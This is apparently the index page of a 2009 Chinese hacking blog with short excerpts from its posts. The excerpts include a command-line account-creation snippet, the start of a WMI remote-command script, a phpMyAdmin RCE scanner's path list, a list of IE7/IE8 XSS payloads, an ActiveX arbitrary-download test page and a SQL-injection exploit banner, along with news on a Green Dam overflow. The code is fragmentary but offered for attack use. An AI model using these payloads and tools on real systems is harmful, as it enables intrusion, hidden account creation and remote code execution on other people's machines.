|
Notice: |
命令行下一种新的加帐号的方法
作者:admin 日期:2009-07-01
js:
程序代码z=o.create("test") ;
z.changePassword("123456","")
欺骗的艺术 -中文
作者:admin 日期:2009-06-26
看完必有帮助.(本人已经看完了,感觉非常良好,所以发出来分享.)
人类天生就有一种探索周围环境的内在动力,作为年轻人,我和凯文?米特尼克(Kevin Mitnick)对这个世界有着无比的好奇心并渴望证明自己的能力。我们努力学习新事物、解决难题并赢得比赛,但同时这个世界又告诉我们一个行为规则――不要过于放任自己对探索自由的强烈渴望。可对于最大胆的科学家和企业家,还有像凯文?米特尼克这样的人来说,跟随内心的这种渴望会带来极大的兴奋,并使他们完成别人认为是无法做到的事情。
Rcmd.vbs [Remote Cmd with wmi]
作者:admin 日期:2009-06-26
PS:此脚本支持回显! -Np
程序代码Set outstreem=Wscript.stdout
If (LCase(Right(Wscript.fullname,11))="Wscript.exe") Then
Set objShell=Wscript.CreateObject("Wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&Chr(34)&Wscript.ScriptFullName&Chr(34))
Wscript.Quit
End If
If Wscript.arguments.Count<4 Then
usage()
pmaPWN phpMyAdmin Code Injection RCE Scanner
作者:admin 日期:2009-06-25
格式:php
程序代码$list = array(
'/phpmyadmin/',
'/phpMyAdmin/',
'/PMA/',
'/pma/',
'/admin/',
'/dbadmin/',
'/mysql/',
'/myadmin/',
'/phpmyadmin2/',
'/phpMyAdmin2/',
'/phpMyAdmin-2/',
'/php-my-admin/',
'/phpMyAdmin-2.2.3/',
'/phpMyAdmin-2.2.6/',
Tags: pmaPWN phpMyAdmin Code Injection Scanner
Multiple Exploiting IE8/IE7 XSS 漏洞
作者:admin 日期:2009-06-21
Tags[not include <IFRAME>] in ie7/8 are don't allowe to run "javascript:[jscodz]",but
we found them allowed ro run where open it in new target.
代码如下:
程序代码<IMG SRC=javascript:alert('XSS2')>
<BODY BACKGROUND="javascript:alert('XSS3')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS4');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');">
<IFRAME SRC="javascript:alert('XSS6');"></IFRAME>
<DIV STYLE="background-image: url(javascript:alert('XSS7'))">
Tags: Multiple Exploiting IE8/IE7 XSS 漏洞
Edraw PDF Viewer Component任意文件上传漏洞
作者:admin 日期:2009-06-20
BUGTRAQ ID: 35428
Edraw PDF Viewer Component是轻型的ActiveX空间,允许应用程序显示和操作PDF文件。
PDFVIEWER.PDFViewerCtrl.1 ActiveX控件(pdfviewer.ocx)所提供的FtpDownloadFile()方式没有正确地验证用户所提供的输入参数,如果用户受骗访问了恶意网页,就可能向系统上的任意位置下载文件。
测试方法:
程序代码<body>
<BR><object classid="clsid:44A8091F-8F01-43B7-8CF7-4BBA71E61E04"
未来战争网络部队成主导
作者:admin 日期:2009-06-19
绿坝远程缓冲区溢出漏洞
作者:admin 日期:2009-06-13
English:
"Green Dam" is a software used for monitoring and anti-pornography, popularizing by
Chinese goverment. After July 1st, it will be forced to install on all new Chinese PCs.
Now it already has 50 million copies in China.
In order to monitor the URL that user is exploring, Green Dam injected the browser
process. When Green Dam is trying to handle a long URL, a stack overflow will occur in the
browser process.
研究人员发现绿坝高危漏洞
作者:admin 日期:2009-06-12
匿名读者 写道 "密歇根大学研究人员今日发布了一份绿坝的分析报告,报告中指出了一些绿坝的安全隐患,包括一个可以被远程利用的栈溢出漏洞。这三名研究人员分别是密歇根大学计算机系的Scott Wolchok, Randy Yao和J. Alex Halderman。漏洞演示地址:http://wolchok.org:8000/。请注意,安装了绿坝的用户,访问上述网址,浏览器将会崩溃(无其它危害)。当然如果精心设置网页,可以直接控制用户电脑。
如果此漏洞被恶意黑客利用,5000万的绿坝用户将可能全部被黑客控制,沦为肉鸡和傀儡。目前的解决方案是:
1. 关闭绿坝的过滤功能
2. 卸载绿坝(研究也显示软件自身的卸载并不干净)"
Sniggabo CMS 远程SQL注入漏洞
作者:admin 日期:2009-06-12
<?php
print_r('
################################################
Sniggabo CMS - Remote SQL Injection Exploit
Date: 11.06.2009
Vulnerability discovered by: Lidloses_Auge
Exploit coded by: Lidloses_Auge
Homepage: http://www.novusec.com
Greetz to: -=Player=- , Suicide, enco,
Palme, GPM, karamble, Free-Hack
Admin Panel:
Tags: Sniggabo CMS article.php id Remote sql Injection Exploit





